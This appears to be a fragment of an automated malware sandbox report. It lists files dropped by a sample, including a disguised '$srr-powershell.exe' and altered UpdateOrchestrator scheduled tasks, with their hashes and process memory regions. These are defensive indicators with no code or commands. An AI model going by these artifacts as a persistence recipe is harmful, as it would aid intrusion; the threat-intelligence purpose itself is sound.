                                                                                                                        a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                        SHA512

                                                                                                                        2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                                        Filesize

                                                                                                                        409KB

                                                                                                                        MD5

                                                                                                                        a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                                        SHA1

                                                                                                                        3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                                        SHA256

                                                                                                                        43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                                        SHA512

                                                                                                                        458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                                      • C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                        MD5

                                                                                                                        30b6eb355500d4d45cfa73c529d42ae5

                                                                                                                        SHA1

                                                                                                                        c9d08c2942222a18b14ce745715e27e225e73e3f

                                                                                                                        SHA256

                                                                                                                        ed8e0dcc636721dfc1ef54d818d34de375bd1aaf082cd177bce6d6f3c23ed034

                                                                                                                        SHA512

                                                                                                                        716e9ab6927b006b26c60b53123a10e6d3c56103d674ebc6eac200fc2f9d69e54b71570b68879f2c6e0348a0fa18b464c84114d04798a668e0b1a5442146de13

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                        SHA1

                                                                                                                        98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                        SHA256

                                                                                                                        ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                        SHA512

                                                                                                                        c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        f313c5b4f95605026428425586317353

                                                                                                                        SHA1

                                                                                                                        06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                        SHA256

                                                                                                                        129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                        SHA512

                                                                                                                        b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                        SHA1

                                                                                                                        a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                        SHA256

                                                                                                                        98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                        SHA512

                                                                                                                        1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                        SHA1

                                                                                                                        63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                        SHA256

                                                                                                                        727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                        SHA512

                                                                                                                        f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                        SHA1

                                                                                                                        5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                        SHA256

                                                                                                                        55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                        SHA512

                                                                                                                        5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        0b990e24f1e839462c0ac35fef1d119e

                                                                                                                        SHA1

                                                                                                                        9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                        SHA256

                                                                                                                        a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                        SHA512

                                                                                                                        c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                      • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                        Filesize

                                                                                                                        330B

                                                                                                                        MD5

                                                                                                                        0327ee71c235995b541fb2d8fb1a74ef

                                                                                                                        SHA1

                                                                                                                        77b189ade7a2384c2d816641306d958dacaf63b7

                                                                                                                        SHA256

                                                                                                                        0eddeb3acc213dd0071118c12a6261c9df25769200b5f0df0834324c2a2f22d5

                                                                                                                        SHA512

                                                                                                                        04de083f19d56af461b27acb2f3ce27c800ce39ed7e8e9191c4ef1a22c34d8458f89b3252227818d45d7381920a8f14371e1b1728280a2cdbcfb7ddc3a2cdb65

                                                                                                                      • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                        Filesize

                                                                                                                        330B

                                                                                                                        MD5

                                                                                                                        5a21b0cf09a74df05b2a14e7f89633f6

                                                                                                                        SHA1

                                                                                                                        a022c9a10cf8aee70e59dd9488ad5005fdcad0f7

                                                                                                                        SHA256

                                                                                                                        281f554581df00d0d6085c4107b7453d935cce37c45f4b604000eb394c7c2dd6

                                                                                                                        SHA512

                                                                                                                        e4ebd151527ca9cf557751d966e9af2017ce67e5fa29e89fb8d371e65696d722b5856ace69d147bc10a98781fc022b4ec8211aeec696f5c44a11072b4f6dacb1

                                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_gl5mxtip.mgh.ps1
                                                                                                                        Filesize

                                                                                                                        60B

                                                                                                                        MD5

                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                        SHA1

                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                        SHA256

                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                        SHA512

                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                                        Filesize

                                                                                                                        412B

                                                                                                                        MD5

                                                                                                                        56eed8f4471bd2d8105df8cd15c8a377

                                                                                                                        SHA1

                                                                                                                        1e293e8a427c3842ef92508d78827905a0c71f4d

                                                                                                                        SHA256

                                                                                                                        3ddd49e16a6a1d3845a24fa3f491bc5d72d5eae63edec4e5073fbec0793f4666

                                                                                                                        SHA512

                                                                                                                        19a6d10bbbc20d89433118ab2f70cdb682a3b82344553b5d3101f8b6f71c470feb00598c8e481199be0ca8670f963bc617ce38ad2f89ace109100f5ae43803cc

                                                                                                                      • memory/64-90-0x00007FFCE28F0000-0x00007FFCE2900000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/64-83-0x000001DF2DD10000-0x000001DF2DD3B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/64-89-0x000001DF2DD10000-0x000001DF2DD3B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/440-94-0x0000022C13660000-0x0000022C1368B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/608-49-0x0000028236F80000-0x0000028236FAB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/608-50-0x0000028236F80000-0x0000028236FAB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/608-56-0x0000028236F80000-0x0000028236FAB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/608-57-0x00007FFCE28F0000-0x00007FFCE2900000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/608-48-0x0000028236F50000-0x0000028236F75000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        148KB

                                                                                                                      • memory/676-61-0x0000025A13F20000-0x0000025A13F4B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/676-67-0x0000025A13F20000-0x0000025A13F4B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/676-68-0x00007FFCE28F0000-0x00007FFCE2900000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/956-78-0x00000277BF1D0000-0x00000277BF1FB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/956-79-0x00007FFCE28F0000-0x00007FFCE2900000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/956-72-0x00000277BF1D0000-0x00000277BF1FB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/1348-0-0x0000000074D4E000-0x0000000074D4F000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1348-3-0x0000000004D90000-0x0000000004E22000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        584KB

                                                                                                                      • memory/1348-1-0x0000000000300000-0x000000000036C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        432KB

                                                                                                                      • memory/1348-2-0x0000000005250000-0x00000000057F4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        5.6MB

                                                                                                                      • memory/1348-6-0x0000000005A80000-0x0000000005A92000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        72KB

                                                                                                                      • memory/1348-7-0x0000000005FC0000-0x0000000005FFC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        240KB

                                                                                                                      • memory/1348-5-0x0000000004E30000-0x0000000004E96000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        408KB

                                                                                                                      • memory/1348-20-0x0000000074D40000-0x00000000754F0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/1348-4-0x0000000074D40000-0x00000000754F0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/3480-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/3480-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/3480-45-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/3480-42-0x00007FFD21F20000-0x00007FFD21FDE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        760KB

                                                                                                                      • memory/3480-41-0x00007FFD22870000-0x00007FFD22A65000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                      • memory/3480-37-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/3480-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/3480-40-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/4048-21-0x000001F0EF8C0000-0x000001F0EF8E2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        136KB

                                                                                                                      • memory/4048-32-0x000001F0EFC50000-0x000001F0EFC7A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        168KB

                                                                                                                      • memory/4048-34-0x00007FFD21F20000-0x00007FFD21FDE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        760KB

                                                                                                                      • memory/4048-33-0x00007FFD22870000-0x00007FFD22A65000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                      • memory/4492-864-0x0000000074D40000-0x00000000754F0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4492-865-0x0000000074D40000-0x00000000754F0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4492-13-0x0000000074D40000-0x00000000754F0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4492-14-0x0000000074D40000-0x00000000754F0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4492-31-0x00000000068F0000-0x00000000068FA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40KB